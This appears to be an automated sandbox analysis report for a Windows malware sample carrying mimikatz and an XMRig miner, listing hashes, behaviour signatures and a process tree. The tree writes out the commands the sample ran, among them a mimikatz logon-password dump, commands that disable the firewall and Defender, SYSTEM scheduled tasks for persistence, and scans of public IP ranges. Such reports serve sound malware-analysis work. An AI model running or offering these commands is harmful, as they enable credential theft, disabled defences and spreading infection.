Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
02/05/2024, 04:30
General
-
Target
2024-05-02_949a46e841c56415ae74b6de2e0fd035_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
949a46e841c56415ae74b6de2e0fd035
-
SHA1
ef50932422b1be4149d423590934bbb8d71d2088
-
SHA256
03be1233a50d96068c8e4ed80bb86047b117ee341033cae2b20ab697aea59b70
-
SHA512
8e98dbbf40bdc5b0cf688fb2d1ed34cdc5e0df8d10e1ef1d9fd7f7ad6860368dbc90423f9cb8c9f5f068e37c9df90d64044582aeee037b62eaefccfbfd9700fa
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30293) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\vgpardblp\iphvab.exe"C:\Windows\TEMP\vgpardblp\iphvab.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-02_949a46e841c56415ae74b6de2e0fd035_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-02_949a46e841c56415ae74b6de2e0fd035_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jhacitgb\tuipnsn.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\jhacitgb\tuipnsn.exeC:\Windows\jhacitgb\tuipnsn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\jhacitgb\tuipnsn.exeC:\Windows\jhacitgb\tuipnsn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exeC:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt2⤵
-
C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exeC:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iavstblbi\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\iavstblbi\Corporate\vfshost.exeC:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 784 C:\Windows\TEMP\iavstblbi\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 336 C:\Windows\TEMP\iavstblbi\336.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2052 C:\Windows\TEMP\iavstblbi\2052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2656 C:\Windows\TEMP\iavstblbi\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2940 C:\Windows\TEMP\iavstblbi\2940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2616 C:\Windows\TEMP\iavstblbi\2616.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3160 C:\Windows\TEMP\iavstblbi\3160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3752 C:\Windows\TEMP\iavstblbi\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3840 C:\Windows\TEMP\iavstblbi\3840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3904 C:\Windows\TEMP\iavstblbi\3904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3988 C:\Windows\TEMP\iavstblbi\3988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4428 C:\Windows\TEMP\iavstblbi\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3700 C:\Windows\TEMP\iavstblbi\3700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3000 C:\Windows\TEMP\iavstblbi\3000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 224 C:\Windows\TEMP\iavstblbi\224.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 1172 C:\Windows\TEMP\iavstblbi\1172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4740 C:\Windows\TEMP\iavstblbi\4740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4844 C:\Windows\TEMP\iavstblbi\4844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\iavstblbi\tbvbtbbpb\scan.bat2⤵
-
C:\Windows\iavstblbi\tbvbtbbpb\kbvlbvznc.exekbvlbvznc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\rwzxsq.exeC:\Windows\SysWOW64\rwzxsq.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tuipnsn.exe1⤵
-
C:\Windows\ime\tuipnsn.exeC:\Windows\ime\tuipnsn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tuipnsn.exe1⤵
-
C:\Windows\ime\tuipnsn.exeC:\Windows\ime\tuipnsn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD57aa5a1360e816ee73518cbcb67b46a74
SHA16dfcd939159a1202aa99a5a6a8b70c7b4576936e
SHA2565156fda6e03810ae697e6f15cd4c4e8836d11b9a942eb46e0b5b7f3eeafbdbd9
SHA5122b5504b6b8e433ff1b5f4ebdc6a3dd1a4529cbabe6268445710a8712ab72ceeb77dff3d96a7071fc7be69c4b30f95b9a785a9bc17cc77c199490f77e305269ae
-
Filesize
3.9MB
MD53723a612f72e447d3a830f7b77dc1e52
SHA14ef9c05785cfd1dfeb1f515a39e686c38696d0fa
SHA256a6914af7235a87142421ef3e41f20a91a5116b7c32c4e38e6f5538bb8da2c41a
SHA512360defd83cb0259f76a6f93a9d82cf290f34c9772bc218d754f289c7f0e6902c32edeceea361857c6642986aec43593bedb04fedb5ad76bf4a4cbc785a76209d
-
Filesize
7.6MB
MD522b378cd5797736bd2e738f2f8d7af2c
SHA10644bf04d95710adb0f964502bd3181def91d0f9
SHA2566ce545c71c577551cce930dfce8aaa4f481de90b4bfc1fb69951f95eafe85337
SHA512da5b669ce9e462c2866ffe1c07eb87bf333f1780d038012eefb811bd3df8d13a9bdb1ec137c664f557a106f99bfb79ff90e125a33acc78d7914ae6c5da768b0e
-
Filesize
830KB
MD52fd6f01bdbde790fc4afb147e81d4c4e
SHA120c14dc44ca42f9a68ed0149f443c6396a7e09fd
SHA25680483a4482adc470d4717e056a37729004fa4a91a549e388c5aa25ecd60592a1
SHA512f1dd05b89d2222c8c642bc46b6d2fb30473449c4a358d6e9269f132fac4a94b4732087be3b106fd780cd296995ce43d6fb13e59440df9ae31db29902eb5e7918
-
Filesize
8.7MB
MD5216062ce1c512685150e98796fa2a964
SHA14c199e3ff0bfad97b6aec920331811284f35cc4a
SHA2565b0047c69da31495effaab6b6f5fd73ab4fbb136584d6d0858cddf0d06cd4779
SHA512bf4c4706e747ac27f843791a3afa4ad79bfde2bb16168c2f4aaf02c60158fe9d8514497dcec02bca789e57cc37e28ffc5d570535db5bc3c2ae505f3da9928a35
-
Filesize
3.0MB
MD58719b0b7d231193f2520167eccc352bd
SHA155eda424c7e0e37203c655a07c375e9b802362a6
SHA25664dea188c6f03e45964e4a04ecffcd30bb72a3c4d3bbbd3027c6564a6fe77a8d
SHA5128620eed4aaaaf3ff3d0ff6f2fd98ad3935461a18599fd4d15407eb86ccf7dbdf57bc5d17fabacf91cf5b63e1398bd1cc46c7c236bbeec0fbe0de44700fc8c1b4
-
Filesize
33.3MB
MD5470b3e3d305855264c2b6e4763e177f6
SHA13f38753df8be6b377c9bf2934b29e1adcacc73f1
SHA25693d5b206c8de4cf0e956d8447e32bd0958ad0dee134d3516a33dd96893cd00be
SHA5129de60000e42eecba432c803bb6a1ff4aa9b621b063388a02b753102aa04c83fdb3c0438f556506e71b98e8da671cef3abacb2873328974919029f3e92c8a1753
-
Filesize
26.1MB
MD5b03d47d1f5973b49fed1aa0da578be9c
SHA12df44418964fa3204a2ff1f78bfa45c53c1a5e5e
SHA256f1beead24c48d3ee2cf3e07afa48dc7223108583e1efaad4b034c4547761d092
SHA51214931624e8f670350f11476f5c26ecf07f6f3a14992c2392692405631921aff55e3208c230f983759b8f6e9a9f4c988ed591a4fb5ef8e8def00a7ff0d681106b
-
Filesize
2.7MB
MD59e3097643db436c90babcbf1671d6a97
SHA17b658f430653502546901487388f5f2bc6574e54
SHA25647e98d193a36fb5d4c57aae7f70b8b9c3df964c14be7f4b0bfffbfdb482879f8
SHA51208871da380a2be8eba1152cdd1fe1f4b37b45eb61d06a26cd96104ec6652fe1f586d7c66cbbf3311c5addd50c37cc26099c6f2667a4ecd8fdc2f753be456c8d0
-
Filesize
20.6MB
MD57b02b43940c917a83c9bae98017bcfa7
SHA129efe19e43a65b71e338d1010eb379299138ad70
SHA256cd9092b542a2dd02936cc2c7a14980f96e8f21a55ded109e8877c1d8802f1640
SHA5121bdb0269c5d3271cd2831e455a7ecb4c02c7a53ebf8ce01ec6a0f9dc86cdd2ffa896c0a92083e152a51d3bf78a2fd54bcc9b62cd7f8039c8feb43ee2bbccdd39
-
Filesize
8.6MB
MD5da351569ec0eba8cc98f9bea926f1ac1
SHA1a39d5919f1eff8b0eb2f05c5541c6be9ce11887c
SHA2560279535e0f8c0a8c1fec9f41eaa36b71c62df7c35da9aa7e2bab0c11d2f399e5
SHA51203ea218e131767e19d98cac36ae97da2053cf2b915451f058b2b6195c815ba6d157f35b32b3eb7a1aec8250d3b2e0a954d366a3e0140de7ac5159e5169b4929a
-
Filesize
43.9MB
MD581598ffd938de69ccf8630588b30fdbb
SHA1274cc7cdfc87d3401fc5accbbae065c35aff0c37
SHA2567f32ab5e3a89b97ef978acd5dcdc252dab62588278ddda28c4ec0be4c65b87d7
SHA512177786b7c6dd614dbfee582e69adadc992ffbd70aa24a9a5535f8099925879e05685895c8838ca13c41b6f5f1a6e284544391b156df384d510f7c5f1974587ca
-
Filesize
1.2MB
MD5f7ee7dff1c0fb70c654d64b2f4419430
SHA16553ed643c58f922849e5b2ff32cbbb558307f5a
SHA25636848bb8ad3ee7cdd394090f2127f43137321700f5fe5a15f6ef5231f63517c2
SHA512b7e8d4b23b385c196abde953f61e91969f4e020755ccc474e123f43fbbe9df0936cf23c8af998378e377c69e18c046a6e6c3a616341514af9ab83ab1998292b5
-
Filesize
2.0MB
MD526816c8fee4c8593396291ec92caea1a
